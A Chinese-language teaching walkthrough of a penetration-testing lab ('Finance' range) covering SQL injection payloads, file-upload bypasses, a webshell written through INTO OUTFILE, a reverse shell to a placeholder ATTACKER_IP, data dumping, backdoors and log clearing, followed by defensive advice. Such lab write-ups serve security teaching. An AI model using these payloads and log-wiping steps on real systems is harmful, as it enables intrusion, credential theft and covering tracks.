春秋云境 Finance WP 渗透测试教学文档

1. 信息收集阶段

1.1 目标识别

• 目标系统：春秋云境 Finance 平台
• 识别开放端口和服务
• 收集网站架构和技术栈信息

1.2 目录扫描

• 使用工具进行目录爆破，发现敏感路径
• 重点关注后台管理界面、API接口、配置文件等

2. 漏洞发现与分析

2.1 SQL注入漏洞

漏洞位置：用户登录/查询接口
利用方法：

# 基础注入检测
' OR 1=1 -- 
' UNION SELECT 1,2,3 -- 

# 数据库信息获取
' UNION SELECT version(),database(),user() -- 

# 表结构探测
' UNION SELECT table_name,table_schema,3 FROM information_schema.tables -- 

关键点：

• 确认注入点是否存在过滤机制
• 判断数据库类型（MySQL/SQL Server/Oracle）
• 获取数据库版本和用户权限信息

2.2 文件上传漏洞

漏洞特征：

• 文件类型检测不严格
• 路径可预测或可访问
• 上传目录有执行权限

绕过方法：

• 修改Content-Type头
• 使用双后缀名（.php.jpg）
• 大小写变形（.Php, .pHp）
• 空字节截断（.php%00.jpg）

2.3 敏感信息泄露

常见泄露点：

• 备份文件（.bak, .swp, .git）
• 配置文件（config.php, .env）
• 日志文件
• 版本控制文件

3. 权限提升技术

3.1 数据库权限利用

MySQL特定技巧：

# 读取系统文件
' UNION SELECT load_file('/etc/passwd'),2,3 -- 

# 写入Webshell
' UNION SELECT "<?php system($_GET['cmd']); ?>",2,3 INTO OUTFILE '/var/www/html/shell.php' -- 

权限要求：

• 需要FILE权限
• 知道Web目录绝对路径
• 目录有写权限

3.2 系统命令执行

通过Webshell执行：

<?php
// 基础命令执行
system($_GET['cmd']);

// 反弹Shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
?>

4. 内网渗透

4.1 网络探测

# 扫描内网网段
ifconfig
ip route
nmap 192.168.1.0/24

# 端口扫描重点
22（SSH）, 3306（MySQL）, 6379（Redis）, 1433（MSSQL）

4.2 横向移动

• 密码重用攻击
• SSH密钥利用
• 数据库连接利用

5. 数据获取与持久化

5.1 数据提取

数据库数据导出：

# 导出用户表数据
SELECT * FROM users INTO OUTFILE '/tmp/users.csv'

# 或者直接查询显示
' UNION SELECT username,password,email FROM users -- 

5.2 后门部署

Web后门位置：

• Web根目录隐蔽位置
• 图片马（结合文件包含漏洞）
• .htaccess文件修改

6. 痕迹清理

6.1 日志清理

Apache日志：/var/log/apache2/access.log
MySQL日志：清除相关查询记录
系统日志：/var/log/auth.log, /var/log/syslog

6.2 文件清理

• 删除上传的Webshell
• 清除临时文件
• 恢复修改的配置文件

7. 防御建议

7.1 代码层面

• 所有用户输入进行严格过滤
• 使用参数化查询防止SQL注入
• 文件上传进行类型和内容检查

7.2 系统层面

• 最小权限原则运行服务
• 定期更新系统和组件
• 配置适当的防火墙规则

7.3 监控层面

• 部署WAF防护
• 建立安全监控和告警机制
• 定期进行安全审计

8. 工具推荐

8.1 信息收集

• Nmap：端口扫描
• Dirb/Dirsearch：目录扫描
• WhatWeb：CMS识别

8.2 漏洞利用

• Sqlmap：自动化SQL注入
• Burp Suite：Web漏洞扫描
• Metasploit：漏洞利用框架

8.3 后渗透

• Cobalt Strike：红队工具
• Mimikatz：密码提取
• Empire：内网渗透框架

注意：本文档仅用于教育目的，实际渗透测试需获得授权后进行。